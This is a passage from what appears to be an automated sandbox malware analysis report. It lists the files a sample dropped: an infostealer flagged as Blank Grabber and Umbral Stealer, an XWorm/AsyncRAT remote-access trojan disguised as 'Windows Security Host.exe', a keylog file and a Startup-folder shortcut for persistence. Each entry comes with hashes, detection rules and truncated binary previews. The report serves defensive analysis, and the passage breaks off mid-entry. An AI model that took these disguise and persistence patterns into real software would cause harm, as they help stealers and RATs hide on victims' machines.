                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5g.........."......v............... ....@...... ....................................`.................................................4...T.......u............................................................................................ ..H............text....t... ...v.................. ..`.rsrc...u............x..............@..@.reloc...............~..............@..BH...........|............................................................0..R.......(....:....*r...p(....r...po....:-...r-..pr&..p.. (.....@....r...pr<..p(....(....&*.......0..........rL..prT..p.(....s....%.o....%.o....%.o....%.o.....s.......o.....o....&.o....o......(....9.....o....o.............9.....o......*.......8.8p.......0..8.......r\..p.......%...%.r^..p.%...%.r...p.%...%.r...p.(......*.....(....~....%:....&~......*...s....%.....(...+*...0..l.........(....r...p(....(....r\..p.

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Injector.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\8Hd0ZExgJz.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):235008
                                                                                                                                                      Entropy (8bit):6.051866015636964
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:lloZM+rIkd8g+EtXHkv/iD4fDDU7ByalpgRj++72VQb8e1m0tJi:noZtL+EP8fDDU7ByalpgRj++7J9u
                                                                                                                                                      MD5:3882CFE50E35985982E9EF0C01B99C47
                                                                                                                                                      SHA1:6E09C71AE230B839163628C9179B3A3AAC58C1A3
                                                                                                                                                      SHA-256:DA73DB144E8035DD81AB4578B7F856131351EC33119C9CE0C46D852499621636
                                                                                                                                                      SHA-512:A539767DC599B8A6103C413B4A42C83C7CE09D3171C45890F2630AD000166854C5AC220F78AB966EA90C55C1D6361CE70EA5AB3671FC2913445E8009126A534E
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: Joe Security
                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: ditekSHen
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................4...W.......P............................................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................p.......H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Windows Security Host.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):41
                                                                                                                                                      Entropy (8bit):3.7195394315431693
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                                                                                      MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                                                                                      SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                                                                                                      SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                                                                                      SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Windows Security Host.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\8Hd0ZExgJz.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):81408
                                                                                                                                                      Entropy (8bit):5.954946666720508
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:JuB5dC/mjCuRfzCJskO2r7k9M+bKr4xiyOiRM1Z0Yfka6fTTSnxOcxC7QLd0D:JtWCAu7t7X+bKU4/dNfkTX6OoGQLiD
                                                                                                                                                      MD5:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      SHA1:087FFD969B37A73B349A81AF18BB51191EB42CBD
                                                                                                                                                      SHA-256:84BE55FB4B514EBDB999B5CAF4E0837C521B5E7A4F85F636E4593DAF09EEDAE9
                                                                                                                                                      SHA-512:9F63CFDB94AF23CEBC85FFD491364C1A90AB90736FC8DA0FE16EBF2FB18E9A6EB8FEA4DFCA87D8353565BA684B0C8F461371588AAC72101B355886619BF672F6
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, Author: ditekSHen
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....26g.................4..........^S... ...`....@.. ....................................@..................................S..O....`............................................................................... ............... ..H............text...d3... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B................@S......H........^..........&.....................................................(....*.r...p*. E/..*..(....*.rS..p*. ....*.s.........s.........s.........s.........*.r...p*. ....*.ry..p*. .X~.*.r...p*. W.0.*.r...p*. *p{.*.r2..p*. ^c{.*..((...*.r...p*. J...*.rv..p*. 9...*"(....+.*&(....&+.*.+5sY... .... .'..oZ...(,...~....-.(G...(9...~....o[...&.-.*.r...p*. .n..*.r...p*. ...*.r'..p*.r...p*.rM..p*. .O..*.r...p*..............j..................s\..............*"(I...+.*:.t....(D...+.*

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zh5clhp.5xg.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mjwexrr.s1a.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41qrs552.0oa.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zdbxzga.nyj.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccmysjs5.n4l.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czm4hblu.1if.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fosxpqnp.ixl.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3wmtpd2.be3.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpro5lun.v5y.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlguisoa.op4.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvuqulew.azu.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqhmtexp.to5.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orog0nxz.2t2.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4sv5dl0.rmj.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvqu2ftf.aq3.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yb2awty2.tce.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Windows Security Host.exe
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 14 19:20:03 2024, mtime=Thu Nov 14 19:20:03 2024, atime=Thu Nov 14 19:20:03 2024, length=81408, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):849
                                                                                                                                                      Entropy (8bit):5.145376726674209
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8PnYf/sB4Dyp4j6CQuDrNFjAolaW+LgUNwuLzLXbU44t2YZ/elFlSJmkmV:8G/vDSBAdxAQ+L73XbUwqygm
                                                                                                                                                      MD5:D1F98D1B74680FFF164A1ED4B9288F03
                                                                                                                                                      SHA1:8D65A85B7EF36FA4B6D7F37A52167638BEEC1017
                                                                                                                                                      SHA-256:927B32D237B176745AD4216EBEE74423CBA55AD843D8F1530335E57AE70BE140
                                                                                                                                                      SHA-512:38E1BA8A180D83ED91454C955A7A31D9E430C0A67E837707B8B89B7DDDF2196FE758929E5EDBD6B04BD6650084D0223C0B24A4CEF525F1F97DE86D30219FDEA3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:L..................F.... ....{j..6...{j..6...{j..6...>........................:..DG..Yr?.D..U..k0.&...&......Qg.*_....{j..6..N.l..6......t.".CFSF..2..>..nY.. .WINDOW~1.EXE....t.Y^...H.g.3..(.....gVA.G..k...d......nY..nY......IL....................J.w.W.i.n.d.o.w.s. .S.e.c.u.r.i.t.y. .H.o.s.t...e.x.e...H...[...............-.......Z...................C:\Users\user\Windows Security Host.exe........\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s. .S.e.c.u.r.i.t.y. .H.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......888683...........hT..CrF.f4... ..]+.....,......hT..CrF.f4... ..]+.....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                      C:\Users\user\Desktop\DISCORD

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):103
                                                                                                                                                      Entropy (8bit):4.081427527984575
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
                                                                                                                                                      MD5:B016DAFCA051F817C6BA098C096CB450
                                                                                                                                                      SHA1:4CC74827C4B2ED534613C7764E6121CEB041B459
                                                                                                                                                      SHA-256:B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
                                                                                                                                                      SHA-512:D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

                                                                                                                                                      C:\Users\user\Windows Security Host.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Windows Security Host.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):81408
                                                                                                                                                      Entropy (8bit):5.954946666720508
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:JuB5dC/mjCuRfzCJskO2r7k9M+bKr4xiyOiRM1Z0Yfka6fTTSnxOcxC7QLd0D:JtWCAu7t7X+bKU4/dNfkTX6OoGQLiD
                                                                                                                                                      MD5:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      SHA1:087FFD969B37A73B349A81AF18BB51191EB42CBD
                                                                                                                                                      SHA-256:84BE55FB4B514EBDB999B5CAF4E0837C521B5E7A4F85F636E4593DAF09EEDAE9
